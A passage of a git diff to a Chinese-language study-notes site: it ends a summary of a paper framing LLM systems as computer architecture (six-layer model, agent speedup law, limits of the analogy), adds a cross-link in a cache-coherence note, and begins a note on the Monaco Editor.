加速定律) + print("\n--- Agent 加速比分析 ---") + for n in [1, 2, 4, 8]: + speedup = coordinator.estimate_speedup(0.3, n) + print(f" {n:2d} 个 Agent → {speedup:.2f}x 加速") + + +if __name__ == "__main__": + run_ai_coding_workflow() +``` + +运行这个示例会展示六层如何协作:上下文加载 → 任务分解 → Agent 调度 → 权限控制 → 执行 → 性能分析。 + +--- + +## 四、这个类比的边界:什么时候不成立了 + +论文最后一部分很重要:它诚实地指出了"LLM 像计算机"这个类比**哪里会失效**: + +1. **没有固定指令集**:CPU 的 x86/ARM 是确定的,LLM 的"输出指令集"是概率性的。同样的 prompt 可能产生不同的"机器码"。 + +2. **没有明确的边界**:操作系统的内核空间和用户空间有硬边界。LLM 的控制平面和执行平面是交织在一起的,没有清晰的分界。 + +3. **性能模型不同**:CPU 的性能可以用 FLOPS 精确衡量。LLM 的性能还包含语义质量、创造性等难以量化的维度。 + +4. **错误模型不同**:CPU 出错是 bit flip,可以 ECC 纠正。LLM 出错是"语义错误"——语法正确但逻辑荒谬,更难检测和修复。 + +论文说:**类比的价值在于启发思考,不在于严格等价。** ICAM 的价值在于提供了一个组织思想的框架,而不是一个可以精确计算的数学模型。 + +--- + +## 五、学习总结 + +### 这张图帮助我理解的核心要点 + +``` +传统计算机世界 模型原生世界 +───────── ───────── +CPU 缓存 ──────→ KV Cache 复用(语义局部性) +内存管理 ──────→ 上下文窗口管理(上下文预算) +进程调度 ──────→ Agent 调度(确定性控制平面) +Amdahl定律 ──────→ Agent 加速定律(边际递减) +ISA 指令集 ──────→ Prompt + 工具协议 +操作系统 ──────→ LLM-as-OS(双平面模型) +``` + +### 三个最值得记住的概念 + +1. **ICAM 六层模型**——给散落的 AI 系统技术一个统一的坐标系 +2. **双平面模型**——LLM = 概率性执行平面 × 确定性控制平面 +3. **三条定律**——语义局部性、上下文预算、Agent 加速 + +### 推荐延伸阅读方向 + +- vLLM 的 PagedAttention 论文(实践 KV Cache 优化) +- MemGPT 的"恒定大小 LLM"论文(实践上下文管理) +- AutoGen / CrewAI 的架构文档(实践多 Agent 协作) +- 传统计算机架构教材(理解类比来源) + +--- + +*参考资料:Hai Lin. "Model-Native Computing Architecture: Envisioning Future System Architecture Through the Lens of Computer Architecture." arXiv:2606.00288, 2026.* diff --git a/src/content/docs/papers/moesi-cache-coherence-1986.md b/src/content/docs/papers/moesi-cache-coherence-1986.md index 29ff50016..1eeefd3ef 100644 --- a/src/content/docs/papers/moesi-cache-coherence-1986.md +++ b/src/content/docs/papers/moesi-cache-coherence-1986.md @@ -181,4 +181,5 @@ A 改了 line(M),B 来读: - [[kocher-spectre-2019]] —— Spectre 攻击 — 推测执行偷看别人的内存 - [[paxos-1998]] —— Paxos 1998 — 古希腊议会寓言里藏的共识协议 - [[raft]] —— Raft — 易理解的共识算法 +- [[spectre-attack-2018]] —— Spectre Attacks — 推测执行如何绕过边界检查偷读内存 diff --git a/src/content/docs/papers/monaco-editor-2016.md b/src/content/docs/papers/monaco-editor-2016.md new file mode 100644 index 000000000..00847edbd --- /dev/null +++ b/src/content/docs/papers/monaco-editor-2016.md @@ -0,0 +1,292 @@ +--- +title: "Monaco Editor: VS Code's Editor as a Library — 把桌面 IDE 编辑器搬进网页" +来源: https://microsoft.github.io/monaco-editor/ +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 日常类比:发动机 vs 整车 + +想象你要在自家网站里放一个「能写代码的输入框」。最土的做法是 `